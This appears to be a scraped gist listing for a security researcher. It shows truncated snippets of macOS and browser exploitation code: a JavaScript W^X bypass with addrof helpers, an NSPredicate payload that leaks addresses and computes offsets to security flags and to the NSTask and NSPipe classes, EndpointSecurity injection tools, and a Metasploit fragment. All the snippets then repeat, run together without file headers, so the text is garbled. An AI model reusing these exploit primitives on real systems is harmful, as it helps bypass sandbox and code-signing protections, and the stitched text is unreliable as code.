Nacho Sanmillan ulexec

## os_js_testcase.html
<script>

// Case matters, see lib/msf/core/constants.rb
// All of these should match up with constants in ::Msf::HttpClients
var clients_opera  = "Opera";
var clients_ie     = "MSIE";
var clients_ff     = "Firefox";
var clients_chrome = "Chrome";
var clients_safari = "Safari";

## stop_at_entry.c
// To compile: clang stop_at_entry.c -lbsm -lEndpointSecurity -o stop_at_entry,
// then codesign with com.apple.developer.endpoint-security.client and run the
// program as root.

#include <EndpointSecurity/EndpointSecurity.h>
#include <assert.h>
#include <bsm/libbsm.h>
#include <dispatch/dispatch.h>
#include <signal.h>
#include <stdbool.h>

## WX_bypass.js
class Helpers {
    constructor() {
        this.addrof_LO = new Array(1048577);

        this.buf = new ArrayBuffer(8);
        this.f64 = new Float64Array(this.buf);
        this.f32 = new Float32Array(this.buf);
        this.u32 = new Uint32Array(this.buf);
        this.u64 = new BigUint64Array(this.buf);
        this.state = {};

## library_injector.cpp
// To compile: clang++ -arch x86_64 -arch arm64 -std=c++20 library_injector.cpp -lbsm -lEndpointSecurity -o library_injector,
// then codesign with com.apple.developer.endpoint-security.client and run the
// program as root.

#include <EndpointSecurity/EndpointSecurity.h>
#include <algorithm>
#include <array>
#include <bsm/libbsm.h>
#include <cstddef>
#include <cstdint>

## predicament.m
#import <Foundation/Foundation.h>

/*
[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m
[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld     ').longLongValue"
Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld     ").longLongValue' (type: 4)

Value:  105553129238592
Danger: 105553129237664 (offset 928)
[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld     ').longLongValue-928,'longValue').dangerous"

## nspredpayload.m
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
    // use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
    "$_NSPredicateUtilities    := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
    "$_predicateSecurityFlags  := $_NSPredicateUtilities + 0x188c,"      // address of _predicateSecurityFlags
    "$_predicateSecurityOnce   := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
    "$forbiddenClassesLength   := $_predicateSecurityFlags + 0x63a334,"  // address of length field for array of forbidden classes
    "$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4,"  // address of length field for array of forbidden selectors

    "$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
    "$NSPipe := $NSTask - 0x41a0,"                  // address of NSPipe class

## quinefuck.m
// yields brainfuck when quined
char *h = "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
  ">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."; // -> Hello World!
#import <Foundation/Foundation.h>
int main(int argc, char *argv[]) {
  NSString *program = [NSString stringWithUTF8String: argc > 1 ? argv[1] : h];
  NSMutableArray *prog = [NSMutableArray array]; // make the program into an array cuz its easier
  for (int i = 0; i < program.length; i++) {
    NSString *c = [program substringWithRange: NSMakeRange(i, 1)];
    if ([@".,<>-+[]" rangeOfString: c].location != NSNotFound) [prog addObject: c];

## restricted.m
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>

int main() {
    void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
    NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
    NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
    NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
	<script>

	// Case matters, see lib/msf/core/constants.rb
	// All of these should match up with constants in ::Msf::HttpClients
	var clients_opera = "Opera";
	var clients_ie = "MSIE";
	var clients_ff = "Firefox";
	var clients_chrome = "Chrome";
	var clients_safari = "Safari";
	// To compile: clang stop_at_entry.c -lbsm -lEndpointSecurity -o stop_at_entry,
	// then codesign with com.apple.developer.endpoint-security.client and run the
	// program as root.

	#include <EndpointSecurity/EndpointSecurity.h>
	#include <assert.h>
	#include <bsm/libbsm.h>
	#include <dispatch/dispatch.h>
	#include <signal.h>
	#include <stdbool.h>
	class Helpers {
	constructor() {
	this.addrof_LO = new Array(1048577);

	this.buf = new ArrayBuffer(8);
	this.f64 = new Float64Array(this.buf);
	this.f32 = new Float32Array(this.buf);
	this.u32 = new Uint32Array(this.buf);
	this.u64 = new BigUint64Array(this.buf);
	this.state = {};
	// To compile: clang++ -arch x86_64 -arch arm64 -std=c++20 library_injector.cpp -lbsm -lEndpointSecurity -o library_injector,
	// then codesign with com.apple.developer.endpoint-security.client and run the
	// program as root.

	#include <EndpointSecurity/EndpointSecurity.h>
	#include <algorithm>
	#include <array>
	#include <bsm/libbsm.h>
	#include <cstddef>
	#include <cstdint>
	#import <Foundation/Foundation.h>

	/*
	[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m
	[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld ').longLongValue"
	Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue' (type: 4)

	Value: 105553129238592
	Danger: 105553129237664 (offset 928)
	[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld ').longLongValue-928,'longValue').dangerous"
	NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
	// use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
	"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
	"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags
	"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
	"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes
	"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors

	"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
	"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class
	// yields brainfuck when quined
	char *h = "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
	">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."; // -> Hello World!
	#import <Foundation/Foundation.h>
	int main(int argc, char *argv[]) {
	NSString *program = [NSString stringWithUTF8String: argc > 1 ? argv[1] : h];
	NSMutableArray *prog = [NSMutableArray array]; // make the program into an array cuz its easier
	for (int i = 0; i < program.length; i++) {
	NSString *c = [program substringWithRange: NSMakeRange(i, 1)];
	if ([@".,<>-+[]" rangeOfString: c].location != NSNotFound) [prog addObject: c];
	// dump classes and selectors forbidden in NSPredicates
	// `cc -framework Foundation -o restricted restricted.m`
	#import <Foundation/Foundation.h>
	#import <dlfcn.h>

	int main() {
	void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
	NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
	NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
	NSLog(@"Restricted Selectors: %@", RestrictedSelectors());